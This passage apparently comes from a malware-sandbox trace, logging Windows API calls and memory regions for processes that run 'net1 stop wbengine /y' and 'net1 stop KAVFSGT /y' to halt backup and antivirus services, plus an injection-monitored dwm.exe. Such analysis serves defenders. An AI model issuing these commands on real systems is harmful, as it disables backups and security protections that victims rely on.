out: _Dest=0xdc1) returned="3521" [0124.954] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0124.954] GetFileType (hFile=0xb) returned 0x2 [0124.954] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfae8 | out: lpMode=0x1cfae8) returned 1 [0124.955] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfae0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1cfae0*=0x34) returned 1 [0124.955] GetFileType (hFile=0xb) returned 0x2 [0124.955] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfae8 | out: lpMode=0x1cfae8) returned 1 [0124.955] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfae0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1cfae0*=0x2) returned 1 [0124.956] NetApiBufferFree (Buffer=0x64d40) returned 0x0 [0124.956] NetApiBufferFree (Buffer=0x6c0e0) returned 0x0 [0124.956] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop wbengine /y" [0124.956] exit (_Code=2) Process: id = "414" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x21e4d000" os_pid = "0x12d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "408" os_parent_pid = "0xec0" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14290 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14291 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14292 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14293 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14294 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14295 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14297 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14298 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14299 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14300 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 14301 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14302 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14303 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14304 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 14305 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14306 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14307 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14308 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14448 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14449 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14450 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 14451 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14452 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14453 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14454 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14455 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14456 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14457 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14458 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14459 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14460 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14461 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14462 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14463 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14464 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14465 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14466 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14467 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 977 os_tid = 0xe54 [0124.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa10 | out: lpSystemTimeAsFileTime=0x1afa10*(dwLowDateTime=0xff754cd0, dwHighDateTime=0x1d48689)) [0124.862] GetCurrentProcessId () returned 0x12d4 [0124.863] GetCurrentThreadId () returned 0xe54 [0124.863] GetTickCount () returned 0x28cc4 [0124.863] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa18 | out: lpPerformanceCount=0x1afa18*=1817178100000) returned 1 [0124.864] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0124.864] __set_app_type (_Type=0x1) [0124.864] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0124.864] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0124.864] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.864] GetConsoleOutputCP () returned 0x1b5 [0124.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0124.866] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.870] sprintf_s (in: _DstBuf=0x1af9b8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0124.870] setlocale (category=0, locale=".437") returned="English_United States.437" [0124.883] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0124.883] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0124.883] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0124.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af750, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0124.883] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0124.883] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9a8 | out: Buffer=0x1af9a8*=0x3b4d40) returned 0x0 [0124.883] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af9a8 | out: Buffer=0x1af9a8*=0x3bc0e0) returned 0x0 [0124.883] _fileno (_File=0x7fefdba2a80) returned 0 [0124.884] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0124.884] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0124.884] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0124.884] _wcsicmp (_String1="config", _String2="stop") returned -16 [0124.884] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0124.884] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0124.884] _wcsicmp (_String1="file", _String2="stop") returned -13 [0124.884] _wcsicmp (_String1="files", _String2="stop") returned -13 [0124.884] _wcsicmp (_String1="group", _String2="stop") returned -12 [0124.884] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0124.884] _wcsicmp (_String1="help", _String2="stop") returned -11 [0124.884] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0124.884] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0124.884] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0124.884] _wcsicmp (_String1="session", _String2="stop") returned -15 [0124.884] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0124.884] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0124.884] _wcsicmp (_String1="share", _String2="stop") returned -12 [0124.884] _wcsicmp (_String1="start", _String2="stop") returned -14 [0124.884] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0124.884] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0124.884] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0124.884] _wcsicmp (_String1="accounts", _String2="KAVFSGT") returned -10 [0124.884] _wcsicmp (_String1="computer", _String2="KAVFSGT") returned -8 [0124.884] _wcsicmp (_String1="config", _String2="KAVFSGT") returned -8 [0124.884] _wcsicmp (_String1="continue", _String2="KAVFSGT") returned -8 [0124.884] _wcsicmp (_String1="cont", _String2="KAVFSGT") returned -8 [0124.884] _wcsicmp (_String1="file", _String2="KAVFSGT") returned -5 [0124.884] _wcsicmp (_String1="files", _String2="KAVFSGT") returned -5 [0124.884] _wcsicmp (_String1="group", _String2="KAVFSGT") returned -4 [0124.884] _wcsicmp (_String1="groups", _String2="KAVFSGT") returned -4 [0124.884] _wcsicmp (_String1="help", _String2="KAVFSGT") returned -3 [0124.884] _wcsicmp (_String1="helpmsg", _String2="KAVFSGT") returned -3 [0124.884] _wcsicmp (_String1="localgroup", _String2="KAVFSGT") returned 1 [0124.884] _wcsicmp (_String1="pause", _String2="KAVFSGT") returned 5 [0124.885] _wcsicmp (_String1="session", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="sessions", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="sess", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="share", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="start", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="stats", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="statistics", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="stop", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="time", _String2="KAVFSGT") returned 9 [0124.885] _wcsicmp (_String1="user", _String2="KAVFSGT") returned 10 [0124.885] _wcsicmp (_String1="users", _String2="KAVFSGT") returned 10 [0124.885] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0124.885] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0124.885] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0124.885] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0124.885] _wcsicmp (_String1="netpopup", _String2="KAVFSGT") returned 3 [0124.885] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0124.885] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0124.885] _wcsicmp (_String1="rdr", _String2="KAVFSGT") returned 7 [0124.885] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0124.885] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0124.885] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0124.885] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0124.885] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0124.885] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0124.885] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0124.885] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0124.885] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0124.885] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0124.885] _wcsupr (in: _String="KAVFSGT" | out: _String="KAVFSGT") returned="KAVFSGT" [0124.885] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bcdf0 [0124.890] GetServiceKeyNameW (in: hSCManager=0x3bcdf0, lpDisplayName="KAVFSGT", lpServiceName=0xffb35750, lpcchBuffer=0x1af8c8 | out: lpServiceName="", lpcchBuffer=0x1af8c8) returned 0 [0124.891] _wcsicmp (_String1="msg", _String2="KAVFSGT") returned 2 [0124.891] _wcsicmp (_String1="messenger", _String2="KAVFSGT") returned 2 [0124.891] _wcsicmp (_String1="receiver", _String2="KAVFSGT") returned 7 [0124.892] _wcsicmp (_String1="rcv", _String2="KAVFSGT") returned 7 [0124.892] _wcsicmp (_String1="redirector", _String2="KAVFSGT") returned 7 [0124.892] _wcsicmp (_String1="redir", _String2="KAVFSGT") returned 7 [0124.892] _wcsicmp (_String1="rdr", _String2="KAVFSGT") returned 7 [0124.892] _wcsicmp (_String1="workstation", _String2="KAVFSGT") returned 12 [0124.892] _wcsicmp (_String1="work", _String2="KAVFSGT") returned 12 [0124.892] _wcsicmp (_String1="wksta", _String2="KAVFSGT") returned 12 [0124.892] _wcsicmp (_String1="prdr", _String2="KAVFSGT") returned 5 [0124.892] _wcsicmp (_String1="devrdr", _String2="KAVFSGT") returned -7 [0124.892] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSGT") returned 1 [0124.892] _wcsicmp (_String1="server", _String2="KAVFSGT") returned 8 [0124.892] _wcsicmp (_String1="svr", _String2="KAVFSGT") returned 8 [0124.892] _wcsicmp (_String1="srv", _String2="KAVFSGT") returned 8 [0124.892] _wcsicmp (_String1="lanmanserver", _String2="KAVFSGT") returned 1 [0124.892] _wcsicmp (_String1="alerter", _String2="KAVFSGT") returned -10 [0124.892] _wcsicmp (_String1="netlogon", _String2="KAVFSGT") returned 3 [0124.892] NetServiceControl (in: servername=0x0, service="KAVFSGT", opcode=0x0, arg=0x0, bufptr=0x1af8d0 | out: bufptr=0x1af8d0) returned 0x889 [0124.893] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.893] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0124.894] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0124.895] GetFileType (hFile=0xb) returned 0x2 [0124.949] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af798 | out: lpMode=0x1af798) returned 1 [0124.950] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af790, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af790*=0x1e) returned 1 [0124.950] GetFileType (hFile=0xb) returned 0x2 [0124.950] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af798 | out: lpMode=0x1af798) returned 1 [0124.950] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af790, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af790*=0x2) returned 1 [0124.951] _ultow (in: _Dest=0x889, _Radix=1767424 | out: _Dest=0x889) returned="2185" [0124.951] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.951] GetFileType (hFile=0xb) returned 0x2 [0124.951] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af798 | out: lpMode=0x1af798) returned 1 [0124.951] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af790, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af790*=0x34) returned 1 [0124.951] GetFileType (hFile=0xb) returned 0x2 [0124.952] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af798 | out: lpMode=0x1af798) returned 1 [0124.952] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af790, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af790*=0x2) returned 1 [0124.952] NetApiBufferFree (Buffer=0x3b4d40) returned 0x0 [0124.952] NetApiBufferFree (Buffer=0x3bc0e0) returned 0x0 [0124.952] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFSGT /y" [0124.952] exit (_Code=2) Process: id = "415" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x77a8000" os_pid = "0x448" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14345 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14346 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14347 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14348 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14349 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14350 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14351 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14352 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14353 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14354 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 14355 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 14356 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14357 start_va = 0x1b0000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14358 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 14359 start_va = 0x480000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 14360 start_va = 0x610000 end_va = 0x1a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14361 start_va = 0x1a10000 end_va = 0x1e02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a10000" filename = "" Region: id = 14362 start_va = 0x1e70000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 14363 start_va = 0x1e80000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14364 start_va = 0x1f80000 end_va = 0x205efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 14365 start_va = 0x2070000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 14366 start_va = 0x2170000 end_va = 0x21effff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 14367 start_va = 0x21f0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 14368 start_va = 0x2300000 end_va = 0x237ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 14369 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 14370 start_va = 0x2490000 end_va = 0x275efff entry_point = 0x2490000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14371 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14372 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14373 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14374 start_va = 0x77830000 end_va = 0x77836fff entry_point = 0x77830000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 14375 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14376 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14378 start_va = 0xff310000 end_va = 0xff332fff entry_point = 0xff310000 region_type = mapped_file name = "dwm.exe" filename = "\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe") Region: id = 14379 start_va = 0x13f0e0000 end_va = 0x13f113fff entry_point = 0x0 region_type = private name = "private_0x000000013f0e0000" filename = "" Region: id = 14380 start_va = 0x7fefa700000 end_va = 0x7fefa7a6fff entry_point = 0x7fefa700000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 14381 start_va = 0x7fefa7b0000 end_va = 0x7fefa804fff entry_point = 0x7fefa7b0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 14382 start_va = 0x7fefa810000 end_va = 0x7fefa843fff entry_point = 0x7fefa810000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 14383 start_va = 0x7fefa850000 end_va = 0x7fefa9e1fff entry_point = 0x7fefa850000 region_type = mapped_file name = "dwmcore.dll" filename = 